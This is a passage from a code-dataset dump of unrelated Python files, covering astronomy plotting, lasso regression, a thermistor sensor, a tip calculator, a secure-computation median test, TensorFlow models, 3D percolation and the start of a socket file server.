plt.scatter(mags_dust[:,1]-mags_dust[:,2], mags_dust[:,0]-mags_dust[:,1], color='green', marker='v', label='0.4 mag')\n for i in range(0, len(mags_dust)):\n plt.text(mags_dust[i,1]-mags_dust[i,2], mags_dust[i,0]-mags_dust[i,1],str(int(t[i]*1e3)))\n plt.scatter(mags_must[:,1]-mags_must[:,2], mags_must[:,0]-mags_must[:,1], color='red', marker='s', label='0.8 mag')\n for i in range(0, len(mags_must)):\n plt.text(mags_must[i,1]-mags_must[i,2], mags_must[i,0]-mags_must[i,1],str(int(t[i]*1e3)))\n plt.scatter(-2.5*np.log10(catalog['f_814'][j]*1e-9) - -2.5*np.log10(catalog['f_1600'][j]*1e-9), -2.5*np.log10(catalog['f_475'][j]*1e-9) - -2.5*np.log10(catalog['f_814'][j]*1e-9), color='magenta', marker='*', s=500)\n plt.xlabel('[F814W] - [F160W]')\n plt.ylabel('[F475W] - [F814W]')\n plt.xlim([-0.4,1.4])\n plt.ylim([-0.4,1.4])\n plt.title(catalog['ID'][j])\n plt.legend(loc='lower right', prop={'size': 10})\n pdf.savefig()\n plt.close()\n\n fig = plt.figure()\n plt.scatter(mass,t*1e3,color='blue', marker='o', label='no dust')\n plt.scatter(mass_dust,t*1e3,color='green', marker='v', label='0.4 mag')\n plt.scatter(mass_must,t*1e3,color='red', marker='s', label='0.8 mag')\n plt.xlabel('SSP Stellar Mass')\n plt.ylabel('SSP Age [Myr]')\n plt.title(catalog['ID'][j])\n plt.ylim([0,120])\n plt.xlim([1e9,1e11])\n plt.xscale(\"log\", nonposx='clip')\n plt.legend(loc='upper left', prop={'size': 10})\n pdf.savefig()\n plt.close()\n \nos.system('open %s &' % filename)\n","sub_path":"hst/PROSPECTOR/fsps_example.py","file_name":"fsps_example.py","file_ext":"py","file_size_in_byte":4123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"244349877","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn import linear_model, preprocessing\nimport seaborn as sns\n\n#Dataは\"https://web.stanford.edu/~hastie/StatLearnSparsity_files/DATA/crime.html\"\n\ncrime = pd.read_table(\".\\\\Datasets\\\\crime_def.txt\", header=None)\nY = crime.iloc[:, 0]\nX = crime.iloc[:, 2:7]\nsc = preprocessing.StandardScaler()\nX = sc.fit_transform(X) #標準化\nY = Y - Y.mean() #中心化\nZ = pd.DataFrame(X, columns=[\"X1\", \"X2\", \"X3\", \"X4\", \"X5\"])\n\nlasso20 = linear_model.Lasso(alpha=20.0)\nlasso20.fit(X, Y)\n\nprint(lasso20.coef_)\nprint(lasso20.score(X, Y))\n\n\nalpha = np.arange(0.1, 200, 0.1)\n\ncoefs = np.zeros((len(alpha), 5))\n\nfor i, data in enumerate(alpha):\n lasso = linear_model.Lasso(alpha=float(data))\n lasso.fit(X, Y)\n coefs[i] = lasso.coef_ \n\n\nplt.figure(figsize=(12, 24))\n\n#特徴量同士の相関\nplt.subplot(1, 2, 1)\ncolormap = plt.cm.viridis\nplt.title(\"Crime Correlation of Features\")\nsns.heatmap(Z.astype(float).corr(), linewidths=0.1,vmax=1.0, square=True, cmap=colormap, linecolor='white', annot=True)\n\n#解パス図\n#lasso_pathでも代用可能\nplt.subplot(1, 2, 2)\nfor i in np.arange(0, 5, 1):\n plt.plot(np.log(alpha), coefs[:, int(i)], label=\"X{0}\".format(str(i+1)))\n plt.scatter(np.log(20), lasso20.coef_[int(i)], marker='+')\n\nplt.legend()\nplt.xlabel(\"log(alpha)\")\nplt.ylabel(\"coefficients\")\n\nplt.show()\n","sub_path":"Lasso.py","file_name":"Lasso.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"82202696","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ----湖南创乐博智能科技有限公司----\n# 文件名:17_thermistor.py\n# 版本:V2.0\n# author: zhulin\n# 说明:模拟温度传感器实验\n#####################################################\nimport PCF8591 as ADC\nimport RPi.GPIO as GPIO\nimport time\nimport math\n\nmakerobo_DO = 17 # 温度传感器Do管脚\nGPIO.setmode(GPIO.BCM) # 管脚映射,采用BCM编码\n\n# 初始化设置\ndef makerobo_setup():\n\tADC.setup(0x48) # 设置PCF8591模块地址\n\tGPIO.setup(makerobo_DO, GPIO.IN) # 温度传感器DO端口设置为输入模式\n\n# 打印出温度传感器的提示信息\ndef makerobo_Print(x):\n\tif x == 1: # 正合适\n\t\tprint ('')\n\t\tprint ('***********')\n\t\tprint ('* Better~ *')\n\t\tprint ('***********')\n\t\tprint ('')\n\tif x == 0: # 太热\n\t\tprint ('')\n\t\tprint ('************')\n\t\tprint ('* Too Hot! *')\n\t\tprint ('************')\n\t\tprint ('')\n\n# 循环函数\ndef makerobo_loop():\n\tmakerobo_status = 1 # 状态值\n\tmakerobo_tmp = 1 # 当前值\n\twhile True:\n\t\tmakerobo_analogVal = ADC.read(0) # 读取AIN0上的模拟值\n\t\tmakerobo_Vr = 5 * float(makerobo_analogVal) / 255 # 转换到5V范围\n\t\tmakerobo_Rt = 10000 * makerobo_Vr / (5 - makerobo_Vr)\n\t\tmakerobo_temp = 1/(((math.log(makerobo_Rt / 10000)) / 3950) + (1 / (273.15+25)))\n\t\tmakerobo_temp = makerobo_temp - 273.15\n\t\tprint ('temperature = ', makerobo_temp, 'C')\n\t\t\n\t\tmakerobo_tmp = GPIO.input(makerobo_DO) # 读取温度传感器数字端口\n\n\t\tif makerobo_tmp != makerobo_status: # 判断状态值发生改变\n\t\t\tmakerobo_Print(makerobo_tmp) # 打印出温度传感器的提示信息\n\t\t\tmakerobo_status = makerobo_tmp # 把当前状态值设置为比较状态值,避免重复打印; \n\n\t\ttime.sleep(0.2) # 延时 200ms\n\n# 程序入口\nif __name__ == '__main__':\n\ttry:\n\t\tmakerobo_setup() #初始化程序\n\t\tmakerobo_loop() #循环函数\n\texcept KeyboardInterrupt: \n\t\tpass\t\n","sub_path":"examples/17_thermistor/python/17_thermistor.py","file_name":"17_thermistor.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"254235400","text":"#If the bill was $150.00, split between 5 people, with 12% tip. \n#Each person should pay (150.00 / 5) * 1.12 = 33.6\n#Format the result to 2 decimal places = 33.60\n#Tip: There are 2 ways to round a number. You might have to do some Googling to solve this.💪\n#HINT 1: https://www.google.com/search?q=how+to+round+number+to+2+decimal+places+python&oq=how+to+round+number+to+2+decimal\n#HINT 2: https://www.kite.com/python/answers/how-to-limit-a-float-to-two-decimal-places-in-python\nprint('Welcome to the Tip calculator')\nTotal_amt = input(\"Enter total bill amount?\")\nTip_percentage = input(\"Enter what percentage tip would ypu like to give? 10, 12 or 15?\")\nnew_tip = float(Tip_percentage)\nnew_total = float(Total_amt)\nnew_total_incl_tip = new_total*(1 + (new_tip/100))\npeople = float(input(\"How many ppl to split?\"))\ntotal_pp = round(new_total_incl_tip/people, 2)\nprint(f\"Each person should pay ${total_pp}\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"543621100","text":"import math\r\nimport time\r\n\r\n\r\ndef prime_validation(x):\r\n if x <= 1:\r\n return False\r\n if x == 2:\r\n return True\r\n if x > 2 and x % 2 == 0:\r\n return False\r\n\r\n max_div = math.floor(math.sqrt(x))\r\n for i in range(3, 1 + max_div, 2):\r\n if x % i == 0:\r\n return False\r\n return True\r\n\r\n\r\ndef largest_prime_factor(n):\r\n prime_factor = 1\r\n i = 2\r\n while i <= n / i:\r\n if n % i == 0:\r\n prime_factor = i\r\n n /= i\r\n else:\r\n i += 1\r\n if prime_factor < n:\r\n prime_factor = n\r\n return int(prime_factor)\r\n\r\n\r\nstart_time = time.time()\r\nprime_count = 0\r\nnumber_count = 2\r\nprime_sum = 0\r\nfirst_prime = 100003\r\nwhile prime_count != first_prime:\r\n is_prime = prime_validation(number_count)\r\n if is_prime:\r\n prime_count += is_prime\r\n prime_sum += number_count\r\n number_count += 1\r\nprint(f\"Sum of first {first_prime} prime numbers:\", prime_sum)\r\nnew_value_1 = str(prime_sum)[-3:]\r\nprint(\"Three Right most digits:\", new_value_1)\r\nfinal_value = largest_prime_factor(int(new_value_1))\r\nprint(f\"largest Prime Factor of {new_value_1}:\", final_value)\r\nend_time = time.time()\r\nprint(\"Time required :\", end_time - start_time)\r\nprint(\"*\"*25)\r\nprint(f\"{final_value}@vectis.ai\")\r\nprint(\"*\"*25)","sub_path":"Vectis_task.py","file_name":"Vectis_task.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"529527486","text":"# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\nimport unittest\r\nfrom multiprocessing import Manager\r\nimport numpy as np\r\nimport paddle.fluid as fluid\r\nimport paddle_fl.mpc as pfl_mpc\r\nimport test_op_base\r\nfrom paddle_fl.mpc.data_utils.data_utils import get_datautils\r\n\r\naby3 = get_datautils('aby3')\r\n\r\nclass Solution(test_op_base.TestOpBase):\r\n def findMedianSortedArrays(self, **kwargs):\r\n def getKthElement(k):\r\n num = 3\r\n index1, index2, index3 = 0, 0, 0\r\n op_sub = pfl_mpc.layers.elementwise_sub(x=x, y=y)\r\n op_gt = pfl_mpc.layers.greater_than(x=x, y=zero)\r\n while True:\r\n if (index1 == d_1_length and index2 == d_2_length):\r\n return d_3[:,index3 + k - 1:index3 + k],index1, index2, index3 + k,2,index3 + k\r\n if (index2 == d_2_length and index3 == d_3_length):\r\n return d_1[:,index1 + k - 1:index1 + k],index1 + k , index2, index3,0,index1 + k\r\n if (index1 == d_1_length and index3 == d_3_length):\r\n return d_2[:,index2 + k - 1:index2 + k],index1, index2 + k, index3,1,index2 + k\r\n if index1 == d_1_length:\r\n num = num - 1\r\n if index2 == d_2_length:\r\n num = num - 1\r\n if index3 == d_3_length:\r\n num = num - 1\r\n if k == 1:\r\n d_tmp = exe.run(feed={'x': d_1[:,index1:index1+1], 'y': d_2[:,index2:index2+1],'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0],'y':d_2[:,index2:index2+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n d_tmp = exe.run(feed={'x': d_2[:, index2:index2+1], 'y': d_3[:, index3:index3+1], 'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0], 'y': d_3[:, index3:index3+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n return d_3[:,index3:index3+1],index1, index2, index3 + 1,2,index3 + 1\r\n else:\r\n return d_2[:,index2:index2+1],index1, index2 + 1, index3,1,index2 + 1\r\n else:\r\n d_tmp = exe.run(feed={'x': d_1[:, index1:index1+1], 'y': d_3[:, index3:index3+1], 'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0], 'y': d_3[:, index3:index3+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n return d_3[:,index3:index3+1],index1, index2, index3 + 1,2,index3 + 1\r\n else:\r\n return d_1[:,index1:index1+1],index1 + 1, index2, index3,0,index1 + 1\r\n if k == 2:\r\n newIndex1 = min(index1, d_1_length - 1)\r\n newIndex2 = min(index2, d_2_length - 1)\r\n newIndex3 = min(index3, d_3_length - 1)\r\n else:\r\n newIndex1 = min(index1 + k // num - 1, d_1_length - 1)\r\n newIndex2 = min(index2 + k // num - 1, d_2_length - 1)\r\n newIndex3 = min(index3 + k // num - 1, d_3_length - 1)\r\n d_tmp = exe.run(feed={'x': d_1[:,newIndex1:newIndex1+1], 'y': d_2[:,newIndex2:newIndex2+1], 'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0],'y': d_2[:,newIndex2:newIndex2+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n d_tmp = exe.run(feed={'x': d_2[:, newIndex2:newIndex2+1], 'y': d_3[:, newIndex3:newIndex3+1], 'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0], 'y': d_3[:, newIndex3:newIndex3+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n k -= newIndex3 - index3 + 1\r\n index3 = newIndex3 + 1\r\n else:\r\n k -= newIndex2 - index2 + 1\r\n index2 = newIndex2 + 1\r\n else:\r\n d_tmp = exe.run(feed={'x': d_1[:, newIndex1:newIndex1+1], 'y': d_3[:, newIndex3:newIndex3+1], 'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0], 'y': d_3[:, newIndex3:newIndex3+1], 'zero': d_zero},fetch_list=[op_gt])\r\n if results[0] == 1:\r\n k -= newIndex3 - index3 + 1\r\n index3 = newIndex3 + 1\r\n else:\r\n k -= newIndex1 - index1 + 1\r\n index1 = newIndex1 + 1\r\n\r\n def getNextElement(index1,index2,index3,num):\r\n op_sub = pfl_mpc.layers.elementwise_sub(x=x, y=y)\r\n op_gt = pfl_mpc.layers.greater_than(x=x, y=zero)\r\n if(num == 0 and index1 == d_1_length):\r\n d_tmp = exe.run(feed={'x': d_2[:,index2:index2+1], 'y': d_3[:,index3:index3+1],'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0],'y':d_3[:,index3:index3+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n return d_3[:,index3:index3+1]\r\n else:\r\n return d_2[:,index2:index2+1] \r\n if(num == 1 and index2 == d_2_length):\r\n d_tmp = exe.run(feed={'x': d_1[:,index1:index1+1], 'y': d_3[:,index3:index3+1],'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0],'y':d_3[:,index3:index3+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n return d_3[:,index3:index3+1]\r\n else:\r\n return d_1[:,index1:index1+1] \r\n if(num == 2 and index3 == d_3_length):\r\n d_tmp = exe.run(feed={'x': d_1[:,index1:index1+1], 'y': d_2[:,index2:index2+1],'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0],'y':d_2[:,index2:index2+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n return d_2[:,index2:index2+1]\r\n else:\r\n return d_1[:,index1:index1+1] \r\n else:\r\n d_tmp = exe.run(feed={'x': d_1[:,index1:index1+1], 'y': d_2[:,index2:index2+1],'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0],'y':d_2[:,index2:index2+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n d_tmp = exe.run(feed={'x': d_2[:, index2:index2+1], 'y': d_3[:, index3:index3+1], 'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0], 'y': d_3[:, index3:index3+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n return d_3[:,index3:index3+1]\r\n else:\r\n return d_2[:,index2:index2+1]\r\n else:\r\n d_tmp = exe.run(feed={'x': d_1[:, index1:index1+1], 'y': d_3[:, index3:index3+1], 'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0], 'y': d_3[:, index3:index3+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n return d_3[:,index3:index3+1]\r\n else:\r\n return d_1[:,index1:index1+1] \r\n\r\n role = 1\r\n d_1 = np.load('data_C1_P1.npy',allow_pickle=True)\r\n d_2 = np.load('data_C1_P2.npy',allow_pickle=True)\r\n d_3 = np.load('data_C1_P3.npy',allow_pickle=True)\r\n d_zero = np.full((1), fill_value=0).astype('float32')\r\n pfl_mpc.init(\"aby3\", role, \"localhost\", self.server, int(self.port))\r\n x = pfl_mpc.data(name='x', shape=[1], dtype='int64')\r\n y = pfl_mpc.data(name='y', shape=[1], dtype='int64')\r\n zero = fluid.data(name='zero', shape=[1], dtype='float32')\r\n op_add = pfl_mpc.layers.elementwise_add(x=x, y=y)\r\n math_mul = pfl_mpc.layers.elementwise_mul(x, y)\r\n exe = fluid.Executor(place=fluid.CPUPlace())\r\n\r\n d_1_length, d_2_length, d_3_length = d_1.shape[1], d_2.shape[1], d_3.shape[1]\r\n totalLength = d_1_length + d_2_length + d_3_length\r\n if totalLength % 2 == 1:\r\n results = getKthElement((totalLength + 1) // 2)\r\n np.save('result_C1.npy', results[0])\r\n else:\r\n mid_pre = getKthElement((totalLength) // 2)\r\n mid_post = getNextElement(mid_pre[1],mid_pre[2],mid_pre[3],mid_pre[4])\r\n tmp = exe.run(feed={'x': mid_pre[0],'y':mid_post,'zero': d_zero}, fetch_list=[op_add])\r\n d_tmp = np.load('data_C1_tmp.npy',allow_pickle=True)\r\n results = exe.run(feed={'x': tmp[0],'y':d_tmp,'zero': d_zero}, fetch_list=[math_mul])\r\n np.save('result_C1.npy', results[0])\r\n\r\n def test_mid3_C1(self):\r\n ret = self.multi_party_run1(target=self.findMedianSortedArrays)\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","sub_path":"python/paddle_fl/mpc/tests/demo/mid/mid3/mid3_C1.py","file_name":"mid3_C1.py","file_ext":"py","file_size_in_byte":9793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"248836296","text":"import pygame\nfrom pygame.sprite import Sprite\n\nclock = pygame.time.Clock()\nall_sprites = pygame.sprite.Group()\n# Update\nall_sprites.update()\n\n# Draw / render\nscreen.fill(BLACK)\nall_sprites.draw(screen)\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((50, 50))\n self.image.fill(GREEN)\n self.rect = self.image.get_rect()\n self.rect.center = (WIDTH / 2, HEIGHT / 2)\n\nall_sprites = pygame.sprite.Group()\nplayer = Player()\nall_sprites.add(player)","sub_path":"kids_can_code/sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"606147792","text":"import mala\nimport tensorflow as tf\nimport json\n\ndef create_network(input_shape, name):\n\n tf.reset_default_graph()\n\n raw = tf.placeholder(tf.float32, shape=input_shape)\n raw_batched = tf.reshape(raw, (1, 1) + input_shape)\n\n unet, _, _ = mala.networks.unet(raw_batched, 12, 5, [[1,3,3],[1,3,3],[3,3,3]])\n\n embedding_batched, _ = mala.networks.conv_pass(\n unet,\n kernel_sizes=[1],\n num_fmaps=10,\n activation='sigmoid')\n\n output_shape_batched = embedding_batched.get_shape().as_list()\n output_shape = output_shape_batched[1:] # strip the batch dimension\n\n embedding = tf.reshape(embedding_batched, output_shape)\n\n gt_embedding = tf.placeholder(tf.float32, shape=output_shape)\n embedding_loss_weights = tf.placeholder(tf.float32, shape=output_shape)\n loss = tf.losses.mean_squared_error(\n gt_embedding,\n embedding,\n embedding_loss_weights)\n\n summary = tf.summary.scalar('setup02_eucl_loss', loss)\n\n opt = tf.train.AdamOptimizer(\n learning_rate=0.5e-4,\n beta1=0.95,\n beta2=0.999,\n epsilon=1e-8)\n optimizer = opt.minimize(loss)\n\n output_shape = output_shape[1:]\n print(\"input shape : %s\"%(input_shape,))\n print(\"output shape: %s\"%(output_shape,))\n\n tf.train.export_meta_graph(filename=name + '.meta')\n\n config = {\n 'raw': raw.name,\n 'embedding': embedding.name,\n 'gt_embedding': gt_embedding.name,\n 'embedding_loss_weights': embedding_loss_weights.name,\n 'loss': loss.name,\n 'optimizer': optimizer.name,\n 'input_shape': input_shape,\n 'output_shape': output_shape,\n 'summary': summary.name\n }\n with open(name + '.json', 'w') as f:\n json.dump(config, f)\n\nif __name__ == \"__main__\":\n\n z=0\n xy=0\n\n create_network((84, 268, 268), 'train_lsd_net')\n create_network((96+z, 484+xy, 484+xy), 'config')\n\n with open('config.json', 'r') as f:\n config = json.load(f)\n config.update({\n 'out_dims': 10,\n 'out_dtype': 'float32'\n })\n with open('config.json', 'w') as f:\n json.dump(config, f)\n","sub_path":"examples/lsd/mknet.py","file_name":"mknet.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"258705962","text":"from matrixutils import rand_bool_matr\nfrom pprint import pprint\nimport matplotlib.pyplot as plt\nimport argparse\nfrom matrixutils import transpose, dimen, rand_bool_matrix_3d\nfrom geomutils import neighbours, POINTS3D\nimport sys\nimport numpy as np\nfrom binary_search_function import inverse\nfrom pynverse import inversefunc\nfrom itertools import product\nimport random\n\n\ndef flow_hash(open_state):\n n = len(open_state)\n coords = list(product(range(n), range(n), range(n)))\n remaining = coords\n res = {}\n\n def valid(neigh):\n r, c, z = neigh # z = depth as in zorder\n return (0 <= r < n) and (0 <= c < n) and (0 <= z < n)\n\n def get(coord):\n if valid(coord):\n return res.get(coord, None)\n return None\n\n def set(coord, value):\n if valid(coord):\n res[coord] = value\n\n def any_true_neigh(coord):\n neighs = neighbours(coord, points=POINTS3D)\n for neigh in neighs:\n if get(neigh) == True:\n return True\n return None\n\n def nb_false_neighbours(coord):\n return sum([get(neigh) == False for neigh in neighbours(coord, points=POINTS3D)])\n\n def nb_valid_neigbours(coord):\n return sum([valid(neigh) for neigh in neighbours(coord, points=POINTS3D)])\n\n def calc_for(coord):\n i, j, k = coord\n if i == 0:\n set(coord, open_state[i][j][k])\n return\n if open_state[i][j][k] == False:\n set(coord, False)\n return\n if any_true_neigh(coord) == True:\n set(coord, True)\n return\n if nb_false_neighbours(coord) == nb_valid_neigbours(coord):\n set(coord, False)\n return\n while True:\n prev_rem = len(remaining)\n for coord in remaining:\n calc_for(coord)\n remaining = [coord for coord in coords if coord not in res.keys()]\n if not(prev_rem > len(remaining)):\n break\n # print('remaining', remaining)\n # print(remaining[0])\n # nes = neighbours(remaining[0], points=POINTS3D)\n # print(nb_false_neighbours(remaining[0]))\n # print(nb_valid_neigbours(remaining[0]))\n # for n in nes:\n # print(n, res.get(n,None))\n return as_matrix3d(res, n)\n\n\ndef as_matrix3d(hashed_coord, n):\n res = np.full([n, n, n], False, np.bool_)\n for coord in hashed_coord:\n res[coord] = hashed_coord[coord]\n return res\n\n\ndef percolates(open_state):\n flw = flow_hash(open_state)\n return flw[-1].any()\n\n\ndef experiment(n, prob, nb_trials):\n success = 0\n return sum([percolates(rand_bool_matrix_3d(n, n, n, prob)) for i in range(nb_trials)])\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Percolation for a random cube')\n parser.add_argument('n', type=int, help='number of rows')\n parser.add_argument(\n 'p', type=float, help='probability for the cell be True in the matrix cube')\n parser.add_argument('--estimate-threshold',\n help='estimate the threshold of percolates', action='store_true')\n parser.add_argument('--nb-trials', type=int,\n help='number of times the experiment must be carried out')\n args = parser.parse_args()\n n = args.n\n p = args.p\n nb_trials = args.nb_trials\n\n matr = rand_bool_matrix_3d(n, n, n, p)\n # pprint(matr)\n f = flow_hash(matr)\n # pprint(f)\n # print(percolates(matr))\n # pprint(matr)\n # res = flow_hash(matr)\n # pprint(res)\n if nb_trials is None:\n nb_trials = 100\n\n def perc_func(p):\n success = experiment(n, p, nb_trials)\n return success / nb_trials\n\n NBINTERV = 11\n prob_of_success = [0] * NBINTERV\n probs = np.linspace(0, 1, NBINTERV)\n for i, p in enumerate(probs):\n success = experiment(n, p, nb_trials)\n prob_of_success[i] = success / nb_trials\n print(success, nb_trials, success / nb_trials)\n print(prob_of_success)\n fig, ax = plt.subplots()\n ax.set_xlim(0, 1)\n ax.set_ylim(0, 1)\n plt.title('Probability of percolation nb_sites :' +\n str(n) + '³' + ' nb_trials: ' + str(nb_trials))\n plt.xlabel('site vacancy probability')\n plt.ylabel('percolation probability')\n success_color = {True: 'green', False: 'red'}\n colors = [success_color[p > 0.5] for p in prob_of_success]\n plt.scatter(probs, prob_of_success, color=colors)\n plt.show()\n if args.estimate_threshold:\n print('Estimating threshold value...')\n a = inversefunc(perc_func, y_values=0.5, domain=[0.3, 0.8])\n b = inverse(perc_func, 0.5, 0.3, 0.8)\n print('Threshold value using pynverse', a)\n print('Threshold value is', b)\nif __name__ == \"__main__\":\n main()\n","sub_path":"percolation3d.py","file_name":"percolation3d.py","file_ext":"py","file_size_in_byte":4731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"237180274","text":"import os, time, json\nos.environ['TF_CPP_MIN_LOG_LEVEL']='3'\nimport tensorflow as tf\nimport numpy as np\n\nbatch_size = 10\n\ndef read_file(filename):\n '''\n read tfrecord files\n '''\n def _get_num(filepath):\n num=0\n t1 = time.time()\n for record in tf.python_io.tf_record_iterator(filepath):\n num=num+1\n t2 = time.time()\n print(\"{}s taken to get the number of files in tfrecord.\".format(str(t2-t1)))\n return num\n\n num_files=_get_num(filename)\n filename_queue = tf.train.string_input_producer([filename])\n\n reader = tf.TFRecordReader()\n _, serialized_example = reader.read(filename_queue)\n features = tf.parse_single_example(serialized_example,features = {\n 'image/encoded': tf.FixedLenFeature([], tf.string),\n 'image/class/label': tf.FixedLenFeature([], tf.string),\n 'image/filepath': tf.FixedLenFeature([], tf.string),})\n\n image_data=tf.cast(features['image/encoded'], tf.string)\n image_data=tf.image.decode_image(image_data)\n label = tf.cast(features['image/class/label'], tf.string)\n filepath = tf.cast(features['image/filepath'], tf.string)\n\n return num_files, image_data, label, filepath\n\ndef get_label():\n '''\n read label file\n '''\n label_map_path = \"./labelmap/label.txt\"\n label_map_file = open(label_map_path)\n label_map = {}\n for line_number, label in enumerate(label_map_file.readlines()):\n label_map[line_number] = label[:-1]\n line_number += 1\n label_map_file.close()\n\n return label_map\n\ndef predict(filename):\n # get label\n label_map = get_label()\n\n # read tfrecord file\n num_files, image_data, label, filepath = read_file(filename)\n # image_batch, file_batch = tf.train.batch([image_data, filepath],batch_size=8)\n\n # session\n with tf.Session() as sess:\n init_op = tf.initialize_all_variables()\n sess.run(init_op)\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n t1 = time.time()\n image_data_list, file_list, res = [], [], []\n # [input_0, _label, _filepath] = sess.run([image_data, label, filepath])\n print(image_data)\n\n for i in range(num_files):\n # image_data = tf.image.resize_images(image_data, [331, 331])\n t_a1 = time.time()\n [image, file] = sess.run([image_data, filepath])\n t_a2 = time.time()\n # print(\"sess run time: {}\".format(t_a2-t_a1))\n image = tf.image.resize_images(image, [331, 331])\n image = sess.run(image)\n image_data_list.append(image)\n file_list.append(file)\n if (i != 0 and i % batch_size == 0) or (i == num_files-1):\n input = np.asarray(image_data_list)\n input = input.reshape(-1, 331, 331, 3)\n t_b1 = time.time()\n with tf.device('/gpu:0'):\n predictions = inference_session.run(output_layer, feed_dict={input_layer: input})\n predictions = np.squeeze(predictions)\n t_b2 = time.time()\n\n print(\"inference_session #{} run time: {}\".format(i, t_b2-t_b1))\n overall_result = np.argmax(np.sum(predictions, axis=0))\n # print(\"{}: {}\".format(i, overall_result))\n # res.append(np.argmax(np.sum(prediction, axis=0)) for prediction in predictions)\n image_data_list = []\n\n t2 = time.time()\n print(\"average speed: {} s/image\".format((t2-t1)/num_files))\n\n\nif __name__ == '__main__':\n model = \"./model/nasnet_large_v1.pb\"\n model_graph = tf.Graph()\n with model_graph.as_default():\n with tf.gfile.FastGFile(model, 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(graph_def, name='')\n input_layer = model_graph.get_tensor_by_name(\"input:0\")\n output_layer = model_graph.get_tensor_by_name('final_layer/predictions:0')\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n inference_session = tf.Session(graph = model_graph, config=config)\n initializer = np.zeros([1, 331, 331, 3])\n inference_session.run(output_layer, feed_dict={input_layer: initializer})\n file_list = []\n processed_files = []\n for path, dir, files in os.walk(\"./input_data\"):\n for file in files:\n if file == '.DS_Store': continue\n print(\"Reading file {}\".format(file))\n file_path = os.path.join('./input_data', file)\n file_list.append(file_path)\n res = predict(file_path)\n processed_files.append(file)\n\n with open('./model_output/processed_files/test_{}_processed_files.json'.format(model), 'w') as f:\n f.write(json.dump(processed_files))\n","sub_path":"predict4.py","file_name":"predict4.py","file_ext":"py","file_size_in_byte":4854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"506205692","text":"import socket\n\nimport os\n\nfrom sorttree import server_recv\n\nfrom sorttree import sort_tree\n\n\n# print('enter ip server')\n# host = input()\nhost = '127.0.0.1'\n\n# print('enter port number')\n# port = int(input())\nport = 9091\n\n# print('enter the path to the folder in which the files will be saved')\n# drctr_path_ = input()\ndrctr_path = \"/Users/K/Documents/server\"\n\n# open socket\nsock = socket.socket()\nsock.bind((host, port))\nsock.listen(1)\nconn, addr = 